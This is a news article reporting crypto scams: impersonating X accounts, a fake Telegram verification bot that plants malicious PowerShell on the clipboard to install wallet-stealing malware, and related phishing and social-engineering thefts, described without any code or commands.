A new wave of crypto scams has emerged, with attackers using fake X accounts to impersonate popular influencers and lure unsuspecting users into fraudulent Telegram groups.
Users are then manipulated into installing malware that compromises crypto wallet data.
Scammers Moving Beyond Simple Phishing Scams
According to blockchain security firm Scam Sniffer, the scammers comment on legitimate posts, enticing users with offers of exclusive investment insights and “alpha” tips. Once individuals join these Telegram groups, they are immediately prompted to undergo a verification process via a bot called OfficiaISafeguardBot.
The bot creates a false sense of urgency and pushes users to quickly complete the verification. However, this seemingly harmless step is a trap – by completing the verification, the bot injects malicious PowerShell code into the user’s clipboard. When executed, the code downloads malware designed to compromise the system and steal sensitive data, including crypto wallet information.
Scam Sniffer said that the malware has been flagged by VirusTotal as harmful, and previous instances of similar attacks have resulted in private key theft, leading to significant financial losses.
“This represents a new evolution in crypto scams – moving beyond simple phishing to combine social engineering with malware. Stay vigilant and share this to protect others.”
Rampant Scams
Last month, Casa CEO Nick Neuman shared a harrowing tale of a phishing scam that targeted him. In a post on X, Neuman described a call he received from a scammer pretending to be a Coinbase support agent. The scammer claimed that Neuman’s password change request had been canceled and encouraged him to click on a link in a suspicious email.
When Neuman started questioning the scammer, they dropped the act and revealed the operation’s true nature. The scammer bragged about having recently stolen $35,000 from a victim and made it clear that the scam targets only rich crypto investors.
More recently, a crypto user under the pseudonym “LeftsideEmiri,” reported losing $300,000 due to a social engineering attack. According to the user, the attack began when they received a message containing a link to a KakaoTalk conversation, which was supposedly for a partnership meeting. Although the link seemed broken, the user clicked on it, believing it to be harmless.
In hindsight, they suspect that clicking the link triggered the installation of malware, which compromised their Ethereum and Solana wallets, along with several other wallets. The user made it clear that they had not approved or signed any transactions, indicating that the attack was covert and took advantage of social engineering techniques to steal funds.